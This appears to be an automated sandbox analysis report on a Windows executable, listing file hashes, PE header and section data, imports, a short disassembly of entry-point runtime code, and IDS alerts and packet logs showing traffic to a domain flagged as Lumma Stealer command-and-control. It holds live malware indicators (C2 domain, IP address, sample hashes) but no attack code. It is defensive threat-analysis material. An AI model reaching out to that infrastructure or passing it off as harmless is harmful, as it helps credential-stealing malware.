                                                    SHA-256:B4A06B54226AB2211394B6CCE010A3CF803FE9AE7EFE84A3124B18530B1F0902
                                                    SHA-512:FA9FA0002F235799A3BE160638C0EDAFFF7AE76BEF071BB1217F9FA660DF3F7B5EC176C5A33E496590C593CD10E8B7C463AFA5423021D044A44645EA14611A8F
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:MDMP..a..... ........#+f............4...............H........................1..........`.......8...........T...........h>.............x ..........d"..............................................................................eJ......."......GenuineIntel............T.......D...."+f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):8418
                                                    Entropy (8bit):3.6933921698117222
                                                    Encrypted:false
                                                    SSDEEP:192:R6l7wVeJVm646YEIxSU9gAgmf0JmnprD89b8dsfS0m:R6lXJk646YE+SU9gAgmf0JmO8WfA
                                                    MD5:F16111425CE937370526EA573700C098
                                                    SHA1:743D5F01420B80C08D76823B7A99173F4EBA3445
                                                    SHA-256:5C592973511E455D38AAFF2C4BDCF83BD45A539DCDBBD304AE6F9E4395CBD2D7
                                                    SHA-512:4CC4D9FBAB2D45E8486FB5BC3937D2317D3170C7307925157E2EB04E325A8F9E78494FD83213E8D06D3BD0484CF04FA6B234F6E283922539280DCC99E4E64079
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.4.4.4.<./.P.i.
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):4686
                                                    Entropy (8bit):4.45171786614404
                                                    Encrypted:false
                                                    SSDEEP:48:cvIwWl8zsgJg77aI9Ej/WpW8VYNYm8M4J1g/g/V6FZH+q8vig/Vr7gt0Egtkd:uIjfmI7iu7V9J1QU8HKiUr720E2kd
                                                    MD5:0935857C49968C5292CD450075F11520
                                                    SHA1:0B722BA984576D92636218AE726EA721B0C977D0
                                                    SHA-256:C4308C9C40A54039FCCFB4A17BA864E6B81247FBF769158DA71B040608009E5D
                                                    SHA-512:72EB89AD83606AC03882BEE5373EE5CB33EBE73BC5BAC0F956B494500A6674D7ADB12244E4CEF4F6BD47752F850A7D336FA8E356CA800838294CD8B7411D373A
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="296326" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:MS Windows registry file, NT/2000 or above
                                                    Category:dropped
                                                    Size (bytes):1835008
                                                    Entropy (8bit):4.421574982233092
                                                    Encrypted:false
                                                    SSDEEP:6144:OSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNq0uhiTw:tvloTMW+EZMM6DFyE03w
                                                    MD5:40255993A9FE77FD67F158EC1A5954AD
                                                    SHA1:9C6C08BD7B3C1248096DF284F93528D66E61EA31
                                                    SHA-256:4836037D7979DACD103D486B6BCC7ADF28302BB85709934253143515E3862B9F
                                                    SHA-512:676AE9B0A3BEEBCA7F6DC3C641DADF3D29355DF84CEB19FBE03394BC046768185423615968E91A1D2166A1C79D039DAB78A4BEE3C68912623EB3A5AAD694E916
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm*..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Entropy (8bit):6.491780087323678
                                                    TrID:
                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                    • DOS Executable Generic (2002/1) 0.02%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:VoGtelkHSn.exe
                                                    File size:351'232 bytes
                                                    MD5:7f26737f63fcd5b7e2695f438e341075
                                                    SHA1:325092e21e3089979756be19047c44bc4d036dc6
                                                    SHA256:ba7b9fc2750021800299ae2473acdcc6f5bf93e391bebe5da3cd7959904980ff
                                                    SHA512:8e169fdebec064a2a4cdda391dbb189f460e4e931597892ce2c44178cc93ea3a0f38d49761a770a5454cef6a1b626e99b4fbc89ad9f9a722af21320965d87a48
                                                    SSDEEP:6144:yYqGf1ePFElQITCi9mqJeioCyRcjm8GRSpEfJnusH10i:yY3+FEl6QboCGcK3txFV
                                                    TLSH:8474F021B6A1F032D467D8740A38C7E05F7F7DB22BB490477394267E1EB26D19A26723
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#/4.gNZ.gNZ.gNZ.y...vNZ.y....NZ.y...KNZ.@.!.bNZ.gN[..NZ.y...fNZ.y...fNZ.y...fNZ.RichgNZ.................PE..L...S.bc...........
                                                    Icon Hash:67276767c3571667
                                                    Entrypoint:0x401872
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                    DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x6362D753 [Wed Nov 2 20:47:15 2022 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:5
                                                    OS Version Minor:0
                                                    File Version Major:5
                                                    File Version Minor:0
                                                    Subsystem Version Major:5
                                                    Subsystem Version Minor:0
                                                    Import Hash:ecaec964738e0d632998678ce4e20365
                                                    Instruction
                                                    call 00007FC21483BE47h
                                                    jmp 00007FC21483659Dh
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    mov ecx, dword ptr [esp+04h]
                                                    test ecx, 00000003h
                                                    je 00007FC214836746h
                                                    mov al, byte ptr [ecx]
                                                    add ecx, 01h
                                                    test al, al
                                                    je 00007FC214836770h
                                                    test ecx, 00000003h
                                                    jne 00007FC214836711h
                                                    add eax, 00000000h
                                                    lea esp, dword ptr [esp+00000000h]
                                                    lea esp, dword ptr [esp+00000000h]
                                                    mov eax, dword ptr [ecx]
                                                    mov edx, 7EFEFEFFh
                                                    add edx, eax
                                                    xor eax, FFFFFFFFh
                                                    xor eax, edx
                                                    add ecx, 04h
                                                    test eax, 81010100h
                                                    je 00007FC21483670Ah
                                                    mov eax, dword ptr [ecx-04h]
                                                    test al, al
                                                    je 00007FC214836754h
                                                    test ah, ah
                                                    je 00007FC214836746h
                                                    test eax, 00FF0000h
                                                    je 00007FC214836735h
                                                    test eax, FF000000h
                                                    je 00007FC214836724h
                                                    jmp 00007FC2148366EFh
                                                    lea eax, dword ptr [ecx-01h]
                                                    mov ecx, dword ptr [esp+04h]
                                                    sub eax, ecx
                                                    ret
                                                    lea eax, dword ptr [ecx-02h]
                                                    mov ecx, dword ptr [esp+04h]
                                                    sub eax, ecx
                                                    ret
                                                    lea eax, dword ptr [ecx-03h]
                                                    mov ecx, dword ptr [esp+04h]
                                                    sub eax, ecx
                                                    ret
                                                    lea eax, dword ptr [ecx-04h]
                                                    mov ecx, dword ptr [esp+04h]
                                                    sub eax, ecx
                                                    ret
                                                    mov edi, edi
                                                    push ebp
                                                    mov ebp, esp
                                                    sub esp, 20h
                                                    mov eax, dword ptr [ebp+08h]
                                                    push esi
                                                    push edi
                                                    push 00000008h
                                                    pop ecx
                                                    mov esi, 0040E1ECh
                                                    lea edi, dword ptr [ebp-20h]
                                                    rep movsd
                                                    mov dword ptr [ebp-08h], eax
                                                    mov eax, dword ptr [ebp+0Ch]
                                                    pop edi
                                                    mov dword ptr [ebp-04h], eax
                                                    pop esi
                                                    test eax, eax
                                                    je 00007FC21483672Eh
                                                    test byte ptr [eax], 00000008h
                                                    je 00007FC214836729h
                                                    Programming Language:
                                                    • [ASM] VS2008 build 21022
                                                    • [ C ] VS2008 build 21022
                                                    • [C++] VS2008 build 21022
                                                    • [IMP] VS2005 build 50727
                                                    • [RES] VS2008 build 21022
                                                    • [LNK] VS2008 build 21022
                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x4ce9c0x3c.rdata
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x270c0000x70a8.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0xe0000x170.rdata
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x10000xc2530xc40042af5d93e5de7f8a55c75634750a7537False0.6040935905612245data6.532660619634673IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    .rdata0xe0000x3f6e80x3f800d20e7bf0ffb86ede75b94e96b83dcaa3False0.7010065514271654data6.528847670085214IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .data0x4e0000x26bd4480x2a00085860a21bd1c3f20e0080516c22fd1aunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .rsrc0x270c0000x70a80x7200541c61aa88f1e9635dd9d264fdac7aa7False0.5160704495614035data5.167904163827637IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                    RT_CURSOR0x2711bc80x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.4276315789473684
                                                    RT_ICON0x270c4200xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.43150319829424305
                                                    RT_ICON0x270d2c80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.5672382671480144
                                                    RT_ICON0x270db700x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.6261520737327189
                                                    RT_ICON0x270e2380x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.6784682080924855
                                                    RT_ICON0x270e7a00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TurkishTurkey0.5152489626556016
                                                    RT_ICON0x2710d480x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.5864754098360656
                                                    RT_ICON0x27116d00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.6152482269503546
                                                    RT_STRING0x2711ef00xa2data0.5864197530864198
                                                    RT_STRING0x2711f980x662data0.4339045287637699
                                                    RT_STRING0x27126000x1cedata0.474025974025974
                                                    RT_STRING0x27127d00x694data0.42636579572446553
                                                    RT_STRING0x2712e680x16cdata0.5137362637362637
                                                    RT_STRING0x2712fd80xccdata0.5637254901960784
                                                    RT_ACCELERATOR0x2711ba00x28data1.0
                                                    RT_GROUP_CURSOR0x2711cf80x14data1.15
                                                    RT_GROUP_ICON0x2711b380x68dataTurkishTurkey0.7115384615384616
                                                    RT_VERSION0x2711d100x1e0data0.575
                                                    DLLImport
                                                    KERNEL32.dllGetModuleHandleW, GetProcessHeap, GetDateFormatA, SetCommState, GlobalAlloc, GetVolumeInformationA, IsBadCodePtr, HeapDestroy, GetModuleFileNameW, SetConsoleTitleA, GlobalUnfix, EnumCalendarInfoW, GetProcAddress, SetFirmwareEnvironmentVariableW, LoadLibraryA, GetFileType, SetConsoleDisplayMode, FreeEnvironmentStringsW, BuildCommDCBA, VirtualProtect, GetCurrentDirectoryA, FindAtomW, FileTimeToLocalFileTime, SetFileAttributesW, SetCurrentDirectoryA, GetLocaleInfoA, GetLastError, HeapReAlloc, HeapAlloc, GetCommandLineA, GetStartupInfoA, RaiseException, RtlUnwind, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapFree, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, HeapCreate, VirtualFree, VirtualAlloc, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, MultiByteToWideChar, InitializeCriticalSectionAndSpinCount, HeapSize, GetConsoleCP, GetConsoleMode, FlushFileBuffers, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, ReadFile, SetFilePointer, CloseHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetStdHandle, CreateFileA
                                                    ADVAPI32.dllReadEventLogW
                                                    Language of compilation systemCountry where language is spokenMap
                                                    TurkishTurkey
                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                    04/26/24-05:44:01.105350TCP2052230ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI)49706443192.168.2.5172.67.163.209
                                                    04/26/24-05:44:03.319178TCP2052230ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI)49708443192.168.2.5172.67.163.209
                                                    04/26/24-05:43:59.940120TCP2052230ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI)49705443192.168.2.5172.67.163.209
                                                    04/26/24-05:44:05.638317TCP2052230ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI)49710443192.168.2.5172.67.163.209
                                                    04/26/24-05:43:58.725101UDP2052229ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (strollheavengwu .shop)5741253192.168.2.51.1.1.1
                                                    04/26/24-05:44:04.568308TCP2052230ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI)49709443192.168.2.5172.67.163.209
                                                    04/26/24-05:43:58.891180TCP2052230ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI)49704443192.168.2.5172.67.163.209
                                                    04/26/24-05:44:07.287198TCP2052230ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI)49711443192.168.2.5172.67.163.209
                                                    04/26/24-05:44:02.110134TCP2052230ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI)49707443192.168.2.5172.67.163.209
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Apr 26, 2024 05:43:58.889981985 CEST49704443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:43:58.890038013 CEST44349704172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:43:58.890126944 CEST49704443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:43:58.891180038 CEST49704443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:43:58.891199112 CEST44349704172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:43:59.207051039 CEST44349704172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:43:59.207191944 CEST49704443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:43:59.216829062 CEST49704443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:43:59.216849089 CEST44349704172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:43:59.217192888 CEST44349704172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:43:59.263021946 CEST49704443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:43:59.264970064 CEST49704443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:43:59.264992952 CEST49704443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:43:59.265080929 CEST44349704172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:43:59.931391001 CEST44349704172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:43:59.931526899 CEST44349704172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:43:59.931588888 CEST49704443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:43:59.933892965 CEST49704443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:43:59.933914900 CEST44349704172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:43:59.933932066 CEST49704443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:43:59.933938026 CEST44349704172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:43:59.939722061 CEST49705443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:43:59.939765930 CEST44349705172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:43:59.939831018 CEST49705443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:43:59.940119982 CEST49705443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:43:59.940136909 CEST44349705172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:00.255330086 CEST44349705172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:00.255424023 CEST49705443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:00.256745100 CEST49705443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:00.256766081 CEST44349705172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:00.257170916 CEST44349705172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:00.258244991 CEST49705443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:00.258299112 CEST49705443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:00.258346081 CEST44349705172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:00.955645084 CEST44349705172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:00.955864906 CEST44349705172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:00.955944061 CEST49705443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:00.955967903 CEST44349705172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:00.955997944 CEST44349705172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:00.956053019 CEST49705443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:00.956087112 CEST44349705172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:00.956254959 CEST44349705172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:00.956311941 CEST49705443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:00.956338882 CEST44349705172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:00.956517935 CEST44349705172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:00.956573009 CEST49705443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:00.956588030 CEST44349705172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:00.957062006 CEST44349705172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:00.957120895 CEST49705443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:00.957134008 CEST44349705172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:00.957252979 CEST44349705172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:00.957314014 CEST49705443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:00.957326889 CEST44349705172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:00.957448006 CEST44349705172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:00.957515001 CEST49705443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:00.957590103 CEST49705443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:00.957590103 CEST49705443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:00.957623005 CEST44349705172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:00.957643986 CEST44349705172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:01.104851007 CEST49706443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:01.104896069 CEST44349706172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:01.104981899 CEST49706443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:01.105350018 CEST49706443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:01.105365992 CEST44349706172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:01.417582035 CEST44349706172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:01.417789936 CEST49706443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:01.419116020 CEST49706443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:01.419123888 CEST44349706172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:01.419447899 CEST44349706172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:01.420758963 CEST49706443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:01.420916080 CEST49706443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:01.420962095 CEST44349706172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:01.951178074 CEST44349706172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:01.951455116 CEST44349706172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:01.951508999 CEST49706443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:01.951554060 CEST49706443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:02.109661102 CEST49707443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:02.109688044 CEST44349707172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:02.109772921 CEST49707443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:02.110133886 CEST49707443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:02.110147953 CEST44349707172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:02.418365002 CEST44349707172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:02.418454885 CEST49707443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:02.420334101 CEST49707443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:02.420341969 CEST44349707172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:02.420672894 CEST44349707172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:02.422275066 CEST49707443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:02.422369003 CEST49707443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:02.422418118 CEST44349707172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:02.422483921 CEST49707443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:02.422496080 CEST44349707172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:03.124844074 CEST44349707172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:03.124954939 CEST44349707172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:03.125013113 CEST49707443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:03.125149965 CEST49707443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:03.125169992 CEST44349707172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:03.318712950 CEST49708443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:03.318744898 CEST44349708172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:03.318948984 CEST49708443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:03.319178104 CEST49708443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:03.319191933 CEST44349708172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:03.628565073 CEST44349708172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:03.628669977 CEST49708443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:03.629968882 CEST49708443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:03.629976988 CEST44349708172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:03.630789042 CEST44349708172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:03.632325888 CEST49708443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:03.632477999 CEST49708443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:03.632512093 CEST44349708172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:03.632586956 CEST49708443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:03.632596016 CEST44349708172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:04.345459938 CEST44349708172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:04.345751047 CEST44349708172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:04.345763922 CEST49708443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:04.345807076 CEST49708443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:04.567754030 CEST49709443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:04.567831993 CEST44349709172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:04.567944050 CEST49709443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:04.568308115 CEST49709443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:04.568341017 CEST44349709172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:04.892745018 CEST44349709172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:04.892913103 CEST49709443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:04.894273996 CEST49709443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:04.894304991 CEST44349709172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:04.895374060 CEST44349709172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:04.896698952 CEST49709443192.168.2.5172.67.163.209
